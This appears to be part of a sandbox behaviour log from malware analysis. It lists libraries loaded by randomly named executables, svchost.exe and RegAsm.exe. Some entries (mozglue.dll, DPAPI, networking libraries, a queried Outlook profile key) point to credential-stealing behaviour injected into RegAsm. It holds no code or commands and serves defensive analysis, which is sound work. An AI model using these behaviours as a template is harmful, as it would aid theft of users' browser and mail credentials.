Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: wldp.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: propsys.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: profapi.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\FileApp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\FileApp.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
